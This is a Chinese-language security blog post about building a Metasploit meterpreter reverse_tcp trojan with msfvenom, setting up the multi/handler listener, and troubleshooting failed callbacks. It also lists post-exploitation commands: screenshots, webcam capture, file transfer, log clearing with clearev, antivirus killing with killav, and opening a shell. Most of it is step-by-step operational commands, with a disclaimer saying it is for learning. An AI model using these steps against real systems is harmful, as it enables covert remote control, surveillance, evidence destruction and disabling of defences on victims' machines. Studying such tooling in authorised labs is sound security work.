渗透测试/应急演练过程中metasploit制作木马连接失败问题排查
声明:本文仅供学习交流,恶意人员请绕路,
******往期经典
网络安全:
1、HCIE-Security心得
2、华为交换机抓包上传至PC分析
3、ARP Miss攻击处置
4、ARP网关欺骗攻击处置
5、基于wireshark快速定位内网DHCP Server仿冒攻击
6、wireshark过滤使用及常见网络攻击检测过滤
渗透测试:
1、基于brupsuite的web弱口令扫描
2、渗透测试/应急演练过程中metasploit制作木马连接失败问题排查
3、DVWA搭建中遇到的无法连接数据库问题及处理
企业安全:
1、企业网络信息安全意识宣贯——屏保制作
2、记一次勒索病毒攻击事件的处理过程
3、网络信息安全意识宣贯屏保CSDN.pptx
4、网络信息安全意识宣贯屏保CSDN.scr
安全合规:
1、信息安全技术-网络安全等级保护三级测评要求.xlsx
安全事件处置及应急管理:
1、linux抓取僵尸网络进程脚本
2、windows一键关闭高危端口
3、自动关闭高危端口脚本
4、windows server进程内存占用及CPU使用率自动监控并记录脚本
5、网络信息安全应急演练方案 .docx
6、网络信息安全应急演练报告 .docx
7、飞客蠕虫病毒?分析、定位、处理
主机安全:
1、linux抓取僵尸网络进程脚本
msf木马制作
网上有很多教程,比较简单,大致说下步骤:
1 生成木马
在kali控制台输入:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.10 LPORT=4444 -f exe >/home/kali/111.exe
- -p 参数后跟上payload(载体),攻击成功之后,要做什么事情
- LHOST 后跟监听的IP,kali的ip
- LPORT 后跟监听的端口,kali监听的端口
- -f 后跟要生成后门文件的类型
2 在kali上开启postgresql服务
- /etc/init.d/postgresql status 查看postgresql服务的状态
- /etc/init.d/postgresql start 开启postgresql服务
- netstat -ntulp 查看端口
如果postgresql状态未开启,一定先要开启后在进行下边操作。
3 开启MSF
kali下输入命令:msfconsole,进入msf6视图(6代表版本)
1 msf6>use exploit/multi/handler 选择exploits
2 msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp 设置payload
3 show options 查看所需设置的参数
set LHOST 192.168.10.10 设置监听地址
set LPORT 4444 设置监听端口
4 run 或者 exploit
4 靶机运行木马
把制作的111.exe拷贝到靶机上运行。
无连接原因排查
1 靶机跟kali网络连接问题
测试两者网络连通性,确保网络正常
2 postgresql服务未开启
开启msf前先检查一下postgresql状态,或者重启一下postgresql服务。
命令:/etc/init.d/postgresql restart
一直排查不到原因的可以将postgresql服务重启试下,我自己测试连不上就是这个问题,当时用process monitor排查木马进程是否启动,发现靶机网络连接192.168.10.10时状态为disconnect。但是在kali上查看postgresql状态为actice,试着重启了一下postgresql服务就可以了
3 木马ip、端口设置及msf监听的ip、端口设置要一致,且ip均为kali的ip
这个初学者老分不清设置的ip,记住为kali的ip
4 查看靶机木马是否被杀毒软件干掉。
现在杀软也不是吃素的,基础的、简单免杀的都会被干掉,测试前可以先关掉杀软。
简单使用
1 截取屏幕
screenshot
2 启用摄像头拍照
webcam_snap
3 查看目标是否为物理机
run post/windows/gather/checkvm
4 上传文件
upload plhhyjds.jpeg
5 下载文件
download C:\Users\11\Desktop\a.php
‘upload’ 'download’命令从远程机器下载文件。 请注意在提供Windows路径时使用双斜线。
6 查看当前路径
getwd
7 清除日志
clearev
8 结束目标主机上的杀毒软件相关进程
run killav
9 获取控制台权限
shell
10 解决控制台乱码
chcp 65001
11 控制多台电脑
sessions -i (i=1,2,3…)
渗透测试/应急演练过程中metasploit制作木马连接失败问题排查相关推荐
- 在应急响应过程中,有什么好的方法可以寻找某一日期创建的文件?
Q:在应急响应过程中,有什么好的方法可以寻找某一日期创建的文件? A:我会通过以下的方式来查找: 1.forfiles-寻找某一日期创建的文件 forfiles /m *.ps1 /d +2022 ...
- 红队攻击演练过程中必须具备哪些能力
开展网络渗透对蓝队人员的岗位技能和动手能力都有较高的要 求,这些能力要求侧重于攻防实战,是蓝队人员综合能力水平的体 现.因为蓝队人员在实战攻防演练中面对的是十分契合真实网络条件 的环境,各项技能与手段 ...
- 域渗透 | kerberos认证及过程中产生的攻击
前言 Windows认证一般包括本地认证(NTLM HASH)和域认证(kerberos). 认证的原理网上有很多文章.如果喜欢听视频课程的话,这里推荐倾旋师傅的分享课 https://www.bil ...
- 红蓝攻防演练过程中零失陷经验分享
本文选取了金融单位.集团公司和政府单位三个红队经典防守实 例,从防守思路.重点和职责分工等方面,直观展示了如何实操红队 防守各阶段的工作及防守策略.防护手段,给不同组织和业务场景 下,分阶段.有侧重开 ...
- 渗透测试:正义黑客的渗透测试以及该过程和黑客活动的区别
2019独角兽企业重金招聘Python工程师标准>>> 渗透测试是正义黑客大展身手的地方.他们可以对漏洞评估中识别出的许多漏洞进行测试,以量化该漏洞带来的实际威胁和风险. 当正义黑客 ...
- 渗透测试笔记 -------------持续更新中~
文章目录 渗透测试 1.Windows基础 1.1 渗透测试介绍 1.2 渗透测试的特点 1.3 渗透测试流程 1.4 Windows网站篇 http协议 http头讲解 静态网站 动态网站 1.5 ...
- 攻防演练过程中防守方必备的关键安全设备
部署安全设备及系统是防守工作的必要条件之一,以下通过边界 防御设备.安全检测设备.流量监控设备.终端防护设备.威胁情报 系统这五方面帮助读者了解.熟悉红队常用的关键安全设备. 边界防御设备 防火墙 防 ...
- Shodan在渗透测试及漏洞挖掘中的一些用法
渗透测试中,第一阶段就是信息搜集,这一阶段完成的如何决定了你之后的进行是否顺利,是否更容易.而关于信息收集的文章网上也是有太多.今天我们来通过一些例子来讲解如何正确使用Shodan这一利器. 想要利用 ...
- 关于测试工程师面试过程中的一些小记
春招打响,作为应届生的我也投入到春招行列中.这半年来都一直处于实习中,却没有好好去总结一下自己学到什么,最近汶汶去面试了一家小公司,本以为自己在大厂做过测试实习生,进入小公司应该妥妥的,然而事实给了自 ...
- mysql数据库表删了重建error_数据库内核月报 - 2015 / 09-MySQL · 捉虫动态 · 建表过程中crash造成重建表失败-阿里云开发者社区...
问题描述 主库的create table语句传到备库,备库SQL线程执行过程中报错: Error 'Can't create table 'XXX.XX' (errno: -1)' on query. ...
最新文章
- 浅谈 MySQL 集群高可用架构
- 阿里巴巴公布第二财季报告,净利润同比增长71%
- javascript知识点记录(2)
- FPGA原语使用方法
- 从零开始写项目第八篇【将未完成的项目发布在Tomcat上】
- LeetCode:Permutations, Permutations II(求全排列)
- .html与.htm为网页后缀的区别
- Python pycurl使用
- 机器学习基础:朴素贝叶斯(Machine Learning Fundamentals: Naive Bayes)
- 《跟阿铭学Linux》第12章 shell脚本中的变量:课后习题与答案
- HiJson(Json格式化工具)64位 V2.1.2绿色版
- 怎样让硬盘分区显示整数大小
- win10找回自带的windows照片查看器——打开jpg、png、gif、psd其他格式的图片
- kika平台广告sdk集成问题
- 学习云计算前景如何?云计算成为获取人工智能主要途径
- 【AI智能写作】怎样写一篇高质量热门火爆的技术文章?
- Azure text-to-speech 语音合成 中文晓晓情感API使用及教程
- 潘晓婷:19年的专注成就九球天后
- EMC Unisphere客户端连接EMC
- 【小波滤波】基于小波变换的噪声信号滤波处理matlab仿真